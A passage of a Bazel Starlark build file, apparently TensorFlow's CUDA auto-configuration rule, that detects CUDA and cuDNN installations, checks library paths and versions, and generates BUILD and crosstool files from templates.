# different from the ones from `clang -xc++`. (Symlink and a dir)
# So we run the compiler with both `-xc` and `-xc++` and merge resulting lists
includes_cpp = _get_cxx_inc_directories_impl(
repository_ctx,
cc,
True,
tf_sysroot,
)
includes_c = _get_cxx_inc_directories_impl(
repository_ctx,
cc,
False,
tf_sysroot,
)
return includes_cpp + [
inc
for inc in includes_c
if inc not in includes_cpp
]
def auto_configure_fail(msg):
"""Output failure message when cuda configuration fails."""
red = "\033[0;31m"
no_color = "\033[0m"
fail("\n%sCuda Configuration Error:%s %s\n" % (red, no_color, msg))
# END cc_configure common functions (see TODO above).
def _cuda_include_path(repository_ctx, cuda_config):
"""Generates the Starlark string with cuda include directories.
Args:
repository_ctx: The repository context.
cc: The path to the gcc host compiler.
Returns:
A list of the gcc host compiler include directories.
"""
nvcc_path = repository_ctx.path("%s/bin/nvcc%s" % (
cuda_config.cuda_toolkit_path,
".exe" if cuda_config.cpu_value == "Windows" else "",
))
# The expected exit code of this command is non-zero. Bazel remote execution
# only caches commands with zero exit code. So force a zero exit code.
cmd = "%s -v /dev/null -o /dev/null ; [ $? -eq 1 ]" % str(nvcc_path)
result = raw_exec(repository_ctx, [get_bash_bin(repository_ctx), "-c", cmd])
target_dir = ""
for one_line in err_out(result).splitlines():
if one_line.startswith("#$ _TARGET_DIR_="):
target_dir = (
cuda_config.cuda_toolkit_path + "/" + one_line.replace(
"#$ _TARGET_DIR_=",
"",
) + "/include"
)
inc_entries = []
if target_dir != "":
inc_entries.append(realpath(repository_ctx, target_dir))
inc_entries.append(realpath(repository_ctx, cuda_config.cuda_toolkit_path + "/include"))
return inc_entries
def enable_cuda(repository_ctx):
"""Returns whether to build with CUDA support."""
return int(get_host_environ(repository_ctx, "TF_NEED_CUDA", False))
def matches_version(environ_version, detected_version):
"""Checks whether the user-specified version matches the detected version.
This function performs a weak matching so that if the user specifies only
the
major or major and minor versions, the versions are still considered
matching
if the version parts match. To illustrate:
environ_version detected_version result
-----------------------------------------
5.1.3 5.1.3 True
5.1 5.1.3 True
5 5.1 True
5.1.3 5.1 False
5.2.3 5.1.3 False
Args:
environ_version: The version specified by the user via environment
variables.
detected_version: The version autodetected from the CUDA installation on
the system.
Returns: True if user-specified version matches detected version and False
otherwise.
"""
environ_version_parts = environ_version.split(".")
detected_version_parts = detected_version.split(".")
if len(detected_version_parts) < len(environ_version_parts):
return False
for i, part in enumerate(detected_version_parts):
if i >= len(environ_version_parts):
break
if part != environ_version_parts[i]:
return False
return True
_NVCC_VERSION_PREFIX = "Cuda compilation tools, release "
_DEFINE_CUDNN_MAJOR = "#define CUDNN_MAJOR"
def compute_capabilities(repository_ctx):
"""Returns a list of strings representing cuda compute capabilities.
Args:
repository_ctx: the repo rule's context.
Returns: list of cuda architectures to compile for. 'compute_xy' refers to
both PTX and SASS, 'sm_xy' refers to SASS only.
"""
capabilities = get_host_environ(
repository_ctx,
_TF_CUDA_COMPUTE_CAPABILITIES,
"compute_35,compute_52",
).split(",")
# Map old 'x.y' capabilities to 'compute_xy'.
for i, capability in enumerate(capabilities):
parts = capability.split(".")
if len(parts) != 2:
continue
capabilities[i] = "compute_%s%s" % (parts[0], parts[1])
# Make list unique
capabilities = dict(zip(capabilities, capabilities)).keys()
# Validate capabilities.
for capability in capabilities:
if not capability.startswith(("compute_", "sm_")):
auto_configure_fail("Invalid compute capability: %s" % capability)
for prefix in ["compute_", "sm_"]:
if not capability.startswith(prefix):
continue
if len(capability) == len(prefix) + 2 and capability[-2:].isdigit():
continue
auto_configure_fail("Invalid compute capability: %s" % capability)
return capabilities
def lib_name(base_name, cpu_value, version = None, static = False):
"""Constructs the platform-specific name of a library.
Args:
base_name: The name of the library, such as "cudart"
cpu_value: The name of the host operating system.
version: The version of the library.
static: True the library is static or False if it is a shared object.
Returns:
The platform-specific name of the library.
"""
version = "" if not version else "." + version
if cpu_value in ("Linux", "FreeBSD"):
if static:
return "lib%s.a" % base_name
return "lib%s.so%s" % (base_name, version)
elif cpu_value == "Windows":
return "%s.lib" % base_name
elif cpu_value == "Darwin":
if static:
return "lib%s.a" % base_name
return "lib%s%s.dylib" % (base_name, version)
else:
auto_configure_fail("Invalid cpu_value: %s" % cpu_value)
def _lib_path(lib, cpu_value, basedir, version, static):
file_name = lib_name(lib, cpu_value, version, static)
return "%s/%s" % (basedir, file_name)
def _should_check_soname(version, static):
return version and not static
def _check_cuda_lib_params(lib, cpu_value, basedir, version, static = False):
return (
_lib_path(lib, cpu_value, basedir, version, static),
_should_check_soname(version, static),
)
def _check_cuda_libs(repository_ctx, script_path, libs):
python_bin = get_python_bin(repository_ctx)
contents = repository_ctx.read(script_path).splitlines()
cmd = "from os import linesep;"
cmd += "f = open('script.py', 'w');"
for line in contents:
cmd += "f.write('%s' + linesep);" % line
cmd += "f.close();"
cmd += "from os import system;"
args = " ".join(["\"" + path + "\" " + str(check) for path, check in libs])
cmd += "system('%s script.py %s');" % (python_bin, args)
all_paths = [path for path, _ in libs]
checked_paths = execute(repository_ctx, [python_bin, "-c", cmd]).stdout.splitlines()
# Filter out empty lines from splitting on '\r\n' on Windows
checked_paths = [path for path in checked_paths if len(path) > 0]
if all_paths != checked_paths:
auto_configure_fail("Error with installed CUDA libs. Expected '%s'. Actual '%s'." % (all_paths, checked_paths))
def _find_libs(repository_ctx, check_cuda_libs_script, cuda_config):
"""Returns the CUDA and cuDNN libraries on the system.
Also, verifies that the script actually exist.
Args:
repository_ctx: The repository context.
check_cuda_libs_script: The path to a script verifying that the cuda
libraries exist on the system.
cuda_config: The CUDA config as returned by _get_cuda_config
Returns:
Map of library names to structs of filename and path.
"""
cpu_value = cuda_config.cpu_value
stub_dir = "" if is_windows(repository_ctx) else "/stubs"
check_cuda_libs_params = {
"cuda": _check_cuda_lib_params(
"cuda",
cpu_value,
cuda_config.config["cuda_library_dir"] + stub_dir,
version = None,
static = False,
),
"cudart": _check_cuda_lib_params(
"cudart",
cpu_value,
cuda_config.config["cuda_library_dir"],
cuda_config.cuda_version,
static = False,
),
"cudart_static": _check_cuda_lib_params(
"cudart_static",
cpu_value,
cuda_config.config["cuda_library_dir"],
cuda_config.cuda_version,
static = True,
),
"cublas": _check_cuda_lib_params(
"cublas",
cpu_value,
cuda_config.config["cublas_library_dir"],
cuda_config.cublas_version,
static = False,
),
"cusolver": _check_cuda_lib_params(
"cusolver",
cpu_value,
cuda_config.config["cusolver_library_dir"],
cuda_config.cusolver_version,
static = False,
),
"curand": _check_cuda_lib_params(
"curand",
cpu_value,
cuda_config.config["curand_library_dir"],
cuda_config.curand_version,
static = False,
),
"cufft": _check_cuda_lib_params(
"cufft",
cpu_value,
cuda_config.config["cufft_library_dir"],
cuda_config.cufft_version,
static = False,
),
"cudnn": _check_cuda_lib_params(
"cudnn",
cpu_value,
cuda_config.config["cudnn_library_dir"],
cuda_config.cudnn_version,
static = False,
),
"cupti": _check_cuda_lib_params(
"cupti",
cpu_value,
cuda_config.config["cupti_library_dir"],
cuda_config.cuda_version,
static = False,
),
"cusparse": _check_cuda_lib_params(
"cusparse",
cpu_value,
cuda_config.config["cusparse_library_dir"],
cuda_config.cusparse_version,
static = False,
),
}
# Verify that the libs actually exist at their locations.
_check_cuda_libs(repository_ctx, check_cuda_libs_script, check_cuda_libs_params.values())
paths = {filename: v[0] for (filename, v) in check_cuda_libs_params.items()}
return paths
def _cudart_static_linkopt(cpu_value):
"""Returns additional platform-specific linkopts for cudart."""
return "" if cpu_value == "Darwin" else "\"-lrt\","
def _exec_find_cuda_config(repository_ctx, script_path, cuda_libraries):
python_bin = get_python_bin(repository_ctx)
# If used with remote execution then repository_ctx.execute() can't
# access files from the source tree. A trick is to read the contents
# of the file in Starlark and embed them as part of the command. In
# this case the trick is not sufficient as the find_cuda_config.py
# script has more than 8192 characters. 8192 is the command length
# limit of cmd.exe on Windows. Thus we additionally need to compress
# the contents locally and decompress them as part of the execute().
compressed_contents = repository_ctx.read(script_path)
decompress_and_execute_cmd = (
"from zlib import decompress;" +
"from base64 import b64decode;" +
"from os import system;" +
"script = decompress(b64decode('%s'));" % compressed_contents +
"f = open('script.py', 'wb');" +
"f.write(script);" +
"f.close();" +
"system('\"%s\" script.py %s');" % (python_bin, " ".join(cuda_libraries))
)
return execute(repository_ctx, [python_bin, "-c", decompress_and_execute_cmd])
# TODO(csigg): Only call once instead of from here, tensorrt_configure.bzl,
# and nccl_configure.bzl.
def find_cuda_config(repository_ctx, script_path, cuda_libraries):
"""Returns CUDA config dictionary from running find_cuda_config.py"""
exec_result = _exec_find_cuda_config(repository_ctx, script_path, cuda_libraries)
if exec_result.return_code:
auto_configure_fail("Failed to run find_cuda_config.py: %s" % err_out(exec_result))
# Parse the dict from stdout.
return dict([tuple(x.split(": ")) for x in exec_result.stdout.splitlines()])
def _get_cuda_config(repository_ctx, find_cuda_config_script):
"""Detects and returns information about the CUDA installation on the system.
Args:
repository_ctx: The repository context.
Returns:
A struct containing the following fields:
cuda_toolkit_path: The CUDA toolkit installation directory.
cudnn_install_basedir: The cuDNN installation directory.
cuda_version: The version of CUDA on the system.
cudnn_version: The version of cuDNN on the system.
compute_capabilities: A list of the system's CUDA compute capabilities.
cpu_value: The name of the host operating system.
"""
config = find_cuda_config(repository_ctx, find_cuda_config_script, ["cuda", "cudnn"])
cpu_value = get_cpu_value(repository_ctx)
toolkit_path = config["cuda_toolkit_path"]
is_windows = cpu_value == "Windows"
cuda_version = config["cuda_version"].split(".")
cuda_major = cuda_version[0]
cuda_minor = cuda_version[1]
cuda_version = ("64_%s%s" if is_windows else "%s.%s") % (cuda_major, cuda_minor)
cudnn_version = ("64_%s" if is_windows else "%s") % config["cudnn_version"]
if int(cuda_major) >= 11:
cublas_version = ("64_%s" if is_windows else "%s") % config["cublas_version"].split(".")[0]
cusolver_version = ("64_%s" if is_windows else "%s") % config["cusolver_version"].split(".")[0]
curand_version = ("64_%s" if is_windows else "%s") % config["curand_version"].split(".")[0]
cufft_version = ("64_%s" if is_windows else "%s") % config["cufft_version"].split(".")[0]
cusparse_version = ("64_%s" if is_windows else "%s") % config["cusparse_version"].split(".")[0]
elif (int(cuda_major), int(cuda_minor)) >= (10, 1):
# cuda_lib_version is for libraries like cuBLAS, cuFFT, cuSOLVER, etc.
# It changed from 'x.y' to just 'x' in CUDA 10.1.
cuda_lib_version = ("64_%s" if is_windows else "%s") % cuda_major
cublas_version = cuda_lib_version
cusolver_version = cuda_lib_version
curand_version = cuda_lib_version
cufft_version = cuda_lib_version
cusparse_version = cuda_lib_version
else:
cublas_version = cuda_version
cusolver_version = cuda_version
curand_version = cuda_version
cufft_version = cuda_version
cusparse_version = cuda_version
return struct(
cuda_toolkit_path = toolkit_path,
cuda_version = cuda_version,
cublas_version = cublas_version,
cusolver_version = cusolver_version,
curand_version = curand_version,
cufft_version = cufft_version,
cusparse_version = cusparse_version,
cudnn_version = cudnn_version,
compute_capabilities = compute_capabilities(repository_ctx),
cpu_value = cpu_value,
config = config,
)
def _tpl(repository_ctx, tpl, substitutions = {}, out = None):
if not out:
out = tpl.replace(":", "/")
repository_ctx.template(
out,
Label("//third_party/gpus/%s.tpl" % tpl),
substitutions,
)
def _file(repository_ctx, label):
repository_ctx.template(
label.replace(":", "/"),
Label("//third_party/gpus/%s.tpl" % label),
{},
)
_DUMMY_CROSSTOOL_BZL_FILE = """
def error_gpu_disabled():
fail("ERROR: Building with --config=cuda but TensorFlow is not configured " +
"to build with GPU support. Please re-run ./configure and enter 'Y' " +
"at the prompt to build with GPU support.")
native.genrule(
name = "error_gen_crosstool",
outs = ["CROSSTOOL"],
cmd = "echo 'Should not be run.' && exit 1",
)
native.filegroup(
name = "crosstool",
srcs = [":CROSSTOOL"],
output_licenses = ["unencumbered"],
)
"""
_DUMMY_CROSSTOOL_BUILD_FILE = """
load("//crosstool:error_gpu_disabled.bzl", "error_gpu_disabled")
error_gpu_disabled()
"""
def _create_dummy_repository(repository_ctx):
cpu_value = get_cpu_value(repository_ctx)
# Set up BUILD file for cuda/.
_tpl(
repository_ctx,
"cuda:build_defs.bzl",
{
"%{cuda_is_configured}": "False",
"%{cuda_extra_copts}": "[]",
"%{cuda_gpu_architectures}": "[]",
},
)
_tpl(
repository_ctx,
"cuda:BUILD",
{
"%{cuda_driver_lib}": lib_name("cuda", cpu_value),
"%{cudart_static_lib}": lib_name(
"cudart_static",
cpu_value,
static = True,
),
"%{cudart_static_linkopt}": _cudart_static_linkopt(cpu_value),
"%{cudart_lib}": lib_name("cudart", cpu_value),
"%{cublas_lib}": lib_name("cublas", cpu_value),
"%{cusolver_lib}": lib_name("cusolver", cpu_value),
"%{cudnn_lib}": lib_name("cudnn", cpu_value),
"%{cufft_lib}": lib_name("cufft", cpu_value),
"%{curand_lib}": lib_name("curand", cpu_value),
"%{cupti_lib}": lib_name("cupti", cpu_value),
"%{cusparse_lib}": lib_name("cusparse", cpu_value),
"%{copy_rules}": """
filegroup(name="cuda-include")
filegroup(name="cublas-include")
filegroup(name="cusolver-include")
filegroup(name="cufft-include")
filegroup(name="cusparse-include")
filegroup(name="curand-include")
filegroup(name="cudnn-include")
""",
},
)
# Create dummy files for the CUDA toolkit since they are still required by
# tensorflow/core/platform/default/build_config:cuda.
repository_ctx.file("cuda/cuda/include/cuda.h")
repository_ctx.file("cuda/cuda/include/cublas.h")
repository_ctx.file("cuda/cuda/include/cudnn.h")
repository_ctx.file("cuda/cuda/extras/CUPTI/include/cupti.h")
repository_ctx.file("cuda/cuda/lib/%s" % lib_name("cuda", cpu_value))
repository_ctx.file("cuda/cuda/lib/%s" % lib_name("cudart", cpu_value))
repository_ctx.file(
"cuda/cuda/lib/%s" % lib_name("cudart_static", cpu_value),
)
repository_ctx.file("cuda/cuda/lib/%s" % lib_name("cublas", cpu_value))
repository_ctx.file("cuda/cuda/lib/%s" % lib_name("cusolver", cpu_value))
repository_ctx.file("cuda/cuda/lib/%s" % lib_name("cudnn", cpu_value))
repository_ctx.file("cuda/cuda/lib/%s" % lib_name("curand", cpu_value))
repository_ctx.file("cuda/cuda/lib/%s" % lib_name("cufft", cpu_value))
repository_ctx.file("cuda/cuda/lib/%s" % lib_name("cupti", cpu_value))
repository_ctx.file("cuda/cuda/lib/%s" % lib_name("cusparse", cpu_value))
# Set up cuda_config.h, which is used by
# tensorflow/stream_executor/dso_loader.cc.
_tpl(
repository_ctx,
"cuda:cuda_config.h",
{
"%{cuda_version}": "",
"%{cublas_version}": "",
"%{cusolver_version}": "",
"%{curand_version}": "",
"%{cufft_version}": "",
"%{cusparse_version}": "",
"%{cudnn_version}": "",
"%{cuda_toolkit_path}": "",
},
"cuda/cuda/cuda_config.h",
)
# Set up cuda_config.py, which is used by gen_build_info to provide
# static build environment info to the API
_tpl(
repository_ctx,
"cuda:cuda_config.py",
_py_tmpl_dict({}),
"cuda/cuda/cuda_config.py",
)
# If cuda_configure is not configured to build with GPU support, and the user
# attempts to build with --config=cuda, add a dummy build rule to intercept
# this and fail with an actionable error message.
repository_ctx.file(
"crosstool/error_gpu_disabled.bzl",
_DUMMY_CROSSTOOL_BZL_FILE,
)
repository_ctx.file("crosstool/BUILD", _DUMMY_CROSSTOOL_BUILD_FILE)
def _norm_path(path):
"""Returns a path with '/' and remove the trailing slash."""
path = path.replace("\\", "/")
if path[-1] == "/":
path = path[:-1]
return path
def make_copy_files_rule(repository_ctx, name, srcs, outs):
"""Returns a rule to copy a set of files."""
cmds = []
# Copy files.
for src, out in zip(srcs, outs):
cmds.append('cp -f "%s" "$(location %s)"' % (src, out))
outs = [(' "%s",' % out) for out in outs]
return """genrule(
name = "%s",
outs = [
%s
],
cmd = \"""%s \""",
)""" % (name, "\n".join(outs), " && \\\n".join(cmds))
def make_copy_dir_rule(repository_ctx, name, src_dir, out_dir, exceptions = None):
"""Returns a rule to recursively copy a directory.
If exceptions is not None, it must be a list of files or directories in
'src_dir'; these will be excluded from copying.
"""
src_dir = _norm_path(src_dir)
out_dir = _norm_path(out_dir)
outs = read_dir(repository_ctx, src_dir)
post_cmd = ""
if exceptions != None:
outs = [x for x in outs if not any([
x.startswith(src_dir + "/" + y)
for y in exceptions
])]
outs = [(' "%s",' % out.replace(src_dir, out_dir)) for out in outs]
# '@D' already contains the relative path for a single file, see
# http://docs.bazel.build/versions/master/be/make-variables.html#predefined_genrule_variables
out_dir = "$(@D)/%s" % out_dir if len(outs) > 1 else "$(@D)"
if exceptions != None:
for x in exceptions:
post_cmd += " ; rm -fR " + out_dir + "/" + x
return """genrule(
name = "%s",
outs = [
%s
],
cmd = \"""cp -rLf "%s/." "%s/" %s\""",
)""" % (name, "\n".join(outs), src_dir, out_dir, post_cmd)
def _flag_enabled(repository_ctx, flag_name):
return get_host_environ(repository_ctx, flag_name) == "1"
def _use_cuda_clang(repository_ctx):
return _flag_enabled(repository_ctx, "TF_CUDA_CLANG")
def _tf_sysroot(repository_ctx):
return get_host_environ(repository_ctx, _TF_SYSROOT, "")
def _compute_cuda_extra_copts(repository_ctx, compute_capabilities):
copts = []
for capability in compute_capabilities:
if capability.startswith("compute_"):
capability = capability.replace("compute_", "sm_")
copts.append("--cuda-include-ptx=%s" % capability)
copts.append("--cuda-gpu-arch=%s" % capability)
return str(copts)
def _tpl_path(repository_ctx, filename):
return repository_ctx.path(Label("//third_party/gpus/%s.tpl" % filename))
def _basename(repository_ctx, path_str):
"""Returns the basename of a path of type string.
This method is different from path.basename in that it also works if
the host platform is different from the execution platform
i.e. linux -> windows.
"""
num_chars = len(path_str)
is_win = is_windows(repository_ctx)
for i in range(num_chars):
r_i = num_chars - 1 - i
if (is_win and path_str[r_i] == "\\") or path_str[r_i] == "/":
return path_str[r_i + 1:]
return path_str
def _create_local_cuda_repository(repository_ctx):
"""Creates the repository containing files set up to build with CUDA."""
# Resolve all labels before doing any real work. Resolving causes the
# function to be restarted with all previous state being lost. This
# can easily lead to a O(n^2) runtime in the number of labels.
# See https://github.com/tensorflow/tensorflow/commit/62bd3534525a036f07d9851b3199d68212904778
tpl_paths = {filename: _tpl_path(repository_ctx, filename) for filename in [
"cuda:build_defs.bzl",
"crosstool:clang/bin/crosstool_wrapper_driver_is_not_gcc",
"crosstool:windows/msvc_wrapper_for_nvcc.py",
"crosstool:BUILD",
"crosstool:cc_toolchain_config.bzl",
"cuda:cuda_config.h",
"cuda:cuda_config.py",
]}
tpl_paths["cuda:BUILD"] = _tpl_path(repository_ctx, "cuda:BUILD.windows" if is_windows(repository_ctx) else "cuda:BUILD")
find_cuda_config_script = repository_ctx.path(Label("@org_tensorflow//third_party/gpus:find_cuda_config.py.gz.base64"))
cuda_config = _get_cuda_config(repository_ctx, find_cuda_config_script)
cuda_include_path = cuda_config.config["cuda_include_dir"]
cublas_include_path = cuda_config.config["cublas_include_dir"]
cudnn_header_dir = cuda_config.config["cudnn_include_dir"]
cupti_header_dir = cuda_config.config["cupti_include_dir"]
nvvm_libdevice_dir = cuda_config.config["nvvm_library_dir"]
# Create genrule to copy files from the installed CUDA toolkit into execroot.
copy_rules = [
make_copy_dir_rule(
repository_ctx,
name = "cuda-include",
src_dir = cuda_include_path,
out_dir = "cuda/include",
),
make_copy_dir_rule(
repository_ctx,
name = "cuda-nvvm",
src_dir = nvvm_libdevice_dir,
out_dir = "cuda/nvvm/libdevice",
),
make_copy_dir_rule(
repository_ctx,
name = "cuda-extras",
src_dir = cupti_header_dir,
out_dir = "cuda/extras/CUPTI/include",
),
]
copy_rules.append(make_copy_files_rule(
repository_ctx,
name = "cublas-include",
srcs = [
cublas_include_path + "/cublas.h",
cublas_include_path + "/cublas_v2.h",
cublas_include_path + "/cublas_api.h",
],
outs = [
"cublas/include/cublas.h",
"cublas/include/cublas_v2.h",
"cublas/include/cublas_api.h",
],
))
cusolver_include_path = cuda_config.config["cusolver_include_dir"]
copy_rules.append(make_copy_files_rule(
repository_ctx,
name = "cusolver-include",
srcs = [
cusolver_include_path + "/cusolver_common.h",
cusolver_include_path + "/cusolverDn.h",
],
outs = [
"cusolver/include/cusolver_common.h",
"cusolver/include/cusolverDn.h",
],
))
cufft_include_path = cuda_config.config["cufft_include_dir"]
copy_rules.append(make_copy_files_rule(
repository_ctx,
name = "cufft-include",
srcs = [
cufft_include_path + "/cufft.h",
],
outs = [
"cufft/include/cufft.h",
],
))
cusparse_include_path = cuda_config.config["cusparse_include_dir"]
copy_rules.append(make_copy_files_rule(
repository_ctx,
name = "cusparse-include",
srcs = [
cusparse_include_path + "/cusparse.h",
],
outs = [
"cusparse/include/cusparse.h",
],
))
curand_include_path = cuda_config.config["curand_include_dir"]
copy_rules.append(make_copy_files_rule(
repository_ctx,
name = "curand-include",
srcs = [
curand_include_path + "/curand.h",
],
outs = [
"curand/include/curand.h",
],
))
check_cuda_libs_script = repository_ctx.path(Label("@org_tensorflow//third_party/gpus:check_cuda_libs.py"))
cuda_libs = _find_libs(repository_ctx, check_cuda_libs_script, cuda_config)
cuda_lib_srcs = []
cuda_lib_outs = []
for path in cuda_libs.values():
cuda_lib_srcs.append(path)
cuda_lib_outs.append("cuda/lib/" + _basename(repository_ctx, path))
copy_rules.append(make_copy_files_rule(
repository_ctx,
name = "cuda-lib",
srcs = cuda_lib_srcs,
outs = cuda_lib_outs,
))
# copy files mentioned in third_party/nccl/build_defs.bzl.tpl
file_ext = ".exe" if is_windows(repository_ctx) else ""
copy_rules.append(make_copy_files_rule(
repository_ctx,
name = "cuda-bin",
srcs = [
cuda_config.cuda_toolkit_path + "/bin/" + "crt/link.stub",
cuda_config.cuda_toolkit_path + "/bin/" + "nvlink" + file_ext,
cuda_config.cuda_toolkit_path + "/bin/" + "fatbinary" + file_ext,
cuda_config.cuda_toolkit_path + "/bin/" + "bin2c" + file_ext,
],
outs = [
"cuda/bin/" + "crt/link.stub",
"cuda/bin/" + "nvlink" + file_ext,
"cuda/bin/" + "fatbinary" + file_ext,
"cuda/bin/" + "bin2c" + file_ext,
],
))
# Select the headers based on the cuDNN version (strip '64_' for Windows).
cudnn_headers = ["cudnn.h"]
if cuda_config.cudnn_version.rsplit("_", 1)[0] >= "8":
cudnn_headers += [
"cudnn_backend.h",
"cudnn_adv_infer.h",
"cudnn_adv_train.h",
"cudnn_cnn_infer.h",
"cudnn_cnn_train.h",
"cudnn_ops_infer.h",
"cudnn_ops_train.h",
"cudnn_version.h",
]
cudnn_srcs = []
cudnn_outs = []
for header in cudnn_headers:
cudnn_srcs.append(cudnn_header_dir + "/" + header)
cudnn_outs.append("cudnn/include/" + header)
copy_rules.append(make_copy_files_rule(
repository_ctx,
name = "cudnn-include",
srcs = cudnn_srcs,
outs = cudnn_outs,
))
# Set up BUILD file for cuda/
repository_ctx.template(
"cuda/build_defs.bzl",
tpl_paths["cuda:build_defs.bzl"],
{
"%{cuda_is_configured}": "True",
"%{cuda_extra_copts}": _compute_cuda_extra_copts(
repository_ctx,
cuda_config.compute_capabilities,
),
"%{cuda_gpu_architectures}": str(cuda_config.compute_capabilities),
},
)
repository_ctx.template(
"cuda/BUILD",
tpl_paths["cuda:BUILD"],
{
"%{cuda_driver_lib}": _basename(repository_ctx, cuda_libs["cuda"]),
"%{cudart_static_lib}": _basename(repository_ctx, cuda_libs["cudart_static"]),
"%{cudart_static_linkopt}": _cudart_static_linkopt(cuda_config.cpu_value),
"%{cudart_lib}": _basename(repository_ctx, cuda_libs["cudart"]),
"%{cublas_lib}": _basename(repository_ctx, cuda_libs["cublas"]),
"%{cusolver_lib}": _basename(repository_ctx, cuda_libs["cusolver"]),
"%{cudnn_lib}": _basename(repository_ctx, cuda_libs["cudnn"]),
"%{cufft_lib}": _basename(repository_ctx, cuda_libs["cufft"]),
"%{curand_lib}": _basename(repository_ctx, cuda_libs["curand"]),
"%{cupti_lib}": _basename(repository_ctx, cuda_libs["cupti"]),
"%{cusparse_lib}": _basename(repository_ctx, cuda_libs["cusparse"]),
"%{copy_rules}": "\n".join(copy_rules),
},
)
is_cuda_clang = _use_cuda_clang(repository_ctx)
tf_sysroot = _tf_sysroot(repository_ctx)
should_download_clang = is_cuda_clang and _flag_enabled(
repository_ctx,
_TF_DOWNLOAD_CLANG,
)
if should_download_clang:
download_clang(repository_ctx, "crosstool/extra_tools")
# Set up crosstool/
cc = find_cc(repository_ctx)
cc_fullpath = cc if not should_download_clang else "crosstool/" + cc
host_compiler_includes = get_cxx_inc_directories(
repository_ctx,
cc_fullpath,
tf_sysroot,
)
cuda_defines = {}
cuda_defines["%{builtin_sysroot}"] = tf_sysroot
cuda_defines["%{cuda_toolkit_path}"] = ""
cuda_defines["%{compiler}"] = "unknown"
if is_cuda_clang:
cuda_defines["%{cuda_toolkit_path}"] = cuda_config.config["cuda_toolkit_path"]
cuda_defines["%{compiler}"] = "clang"
host_compiler_prefix = get_host_environ(repository_ctx, _GCC_HOST_COMPILER_PREFIX)
if not host_compiler_prefix:
host_compiler_prefix = "/usr/bin"
cuda_defines["%{host_compiler_prefix}"] = host_compiler_prefix
# Bazel sets '-B/usr/bin' flag to workaround build errors on RHEL (see
# https://github.com/bazelbuild/bazel/issues/760).
# However, this stops our custom clang toolchain from picking the provided
# LLD linker, so we're only adding '-B/usr/bin' when using non-downloaded
# toolchain.
# TODO: when bazel stops adding '-B/usr/bin' by default, remove this
# flag from the CROSSTOOL completely (see
# https://github.com/bazelbuild/bazel/issues/5634)
if should_download_clang:
cuda_defines["%{linker_bin_path}"] = ""
else:
cuda_defines["%{linker_bin_path}"] = host_compiler_prefix
cuda_defines["%{extra_no_canonical_prefixes_flags}"] = ""
cuda_defines["%{unfiltered_compile_flags}"] = ""
if is_cuda_clang:
cuda_defines["%{host_compiler_path}"] = str(cc)
cuda_defines["%{host_compiler_warnings}"] = """
# Some parts of the codebase set -Werror and hit this warning, so
# switch it off for now.
"-Wno-invalid-partial-specialization"
"""
cuda_defines["%{cxx_builtin_include_directories}"] = to_list_of_strings(host_compiler_includes)
cuda_defines["%{compiler_deps}"] = ":empty"
cuda_defines["%{win_compiler_deps}"] = ":empty"
repository_ctx.file(
"crosstool/clang/bin/crosstool_wrapper_driver_is_not_gcc",
"",
)
repository_ctx.file("crosstool/windows/msvc_wrapper_for_nvcc.py", "")
else:
cuda_defines["%{host_compiler_path}"] = "clang/bin/crosstool_wrapper_driver_is_not_gcc"
cuda_defines["%{host_compiler_warnings}"] = ""
# nvcc has the system include paths built in and will automatically
# search them; we cannot work around that, so we add the relevant cuda
# system paths to the allowed compiler specific include paths.
cuda_defines["%{cxx_builtin_include_directories}"] = to_list_of_strings(
host_compiler_includes + _cuda_include_path(
repository_ctx,
cuda_config,
) + [cupti_header_dir, cudnn_header_dir],
)
# For gcc, do not canonicalize system header paths; some versions of gcc
# pick the shortest possible path for system includes when creating the
# .d file - given that includes that are prefixed with "../" multiple
# time quickly grow longer than the root of the tree, this can lead to
# bazel's header check failing.
cuda_defines["%{extra_no_canonical_prefixes_flags}"] = "\"-fno-canonical-system-headers\""
file_ext = ".exe" if is_windows(repository_ctx) else ""
nvcc_path = "%s/nvcc%s" % (cuda_config.config["cuda_binary_dir"], file_ext)
cuda_defines["%{compiler_deps}"] = ":crosstool_wrapper_driver_is_not_gcc"
cuda_defines["%{win_compiler_deps}"] = ":windows_msvc_wrapper_files"
wrapper_defines = {
"%{cpu_compiler}": str(cc),
"%{cuda_version}": cuda_config.cuda_version,
"%{nvcc_path}": nvcc_path,
"%{gcc_host_compiler_path}": str(cc),
"%{nvcc_tmp_dir}": _get_nvcc_tmp_dir_for_windows(repository_ctx),
}
repository_ctx.template(
"crosstool/clang/bin/crosstool_wrapper_driver_is_not_gcc",
tpl_paths["crosstool:clang/bin/crosstool_wrapper_driver_is_not_gcc"],
wrapper_defines,
)
repository_ctx.template(
"crosstool/windows/msvc_wrapper_for_nvcc.py",
tpl_paths["crosstool:windows/msvc_wrapper_for_nvcc.py"],
wrapper_defines,
)
cuda_defines.update(_get_win_cuda_defines(repository_ctx))
verify_build_defines(cuda_defines)
# Only expand template variables in the BUILD file
repository_ctx.template(
"crosstool/BUILD",
tpl_paths["crosstool:BUILD"],
cuda_defines,
)
# No templating of cc_toolchain_config - use attributes and templatize the
# BUILD file.
repository_ctx.template(
"crosstool/cc_toolchain_config.bzl",
tpl_paths["crosstool:cc_toolchain_config.bzl"],
{},
)
# Set up cuda_config.h, which is used by
# tensorflow/stream_executor/dso_loader.cc.
repository_ctx.template(
"cuda/cuda/cuda_config.h",
tpl_paths["cuda:cuda_config.h"],
{
"%{cuda_version}": cuda_config.cuda_version,
"%{cublas_version}": cuda_config.cublas_version,
"%{cusolver_version}": cuda_config.cusolver_version,
"%{curand_version}": cuda_config.curand_version,
"%{cufft_version}": cuda_config.cufft_version,
"%{cusparse_version}": cuda_config.cusparse_version,
"%{cudnn_version}": cuda_config.cudnn_version,
"%{cuda_toolkit_path}": cuda_config.cuda_toolkit_path,
},
)
# Set up cuda_config.py, which is used by gen_build_info to provide
# static build environment info to the API
repository_ctx.template(
"cuda/cuda/cuda_config.py",
tpl_paths["cuda:cuda_config.py"],
_py_tmpl_dict({
"cuda_version": cuda_config.cuda_version,
"cudnn_version": cuda_config.cudnn_version,
"cuda_compute_capabilities": cuda_config.compute_capabilities,
"cpu_compiler": str(cc),
}),
)
def _py_tmpl_dict(d):
return {"%{cuda_config}": str(d)}
def _create_remote_cuda_repository(repository_ctx, remote_config_repo):
"""Creates pointers to a remotely configured repo set up to build with CUDA."""
_tpl(
repository_ctx,
"cuda:build_defs.bzl",
{
"%{cuda_is_configured}": "True",
"%{cuda_extra_copts}": _compute_cuda_extra_copts(
repository_ctx,
compute_capabilities(repository_ctx),
),
},
)
repository_ctx.template(
"cuda/BUILD",
config_repo_label(remote_config_repo, "cuda:BUILD"),
{},
)
repository_ctx.template(
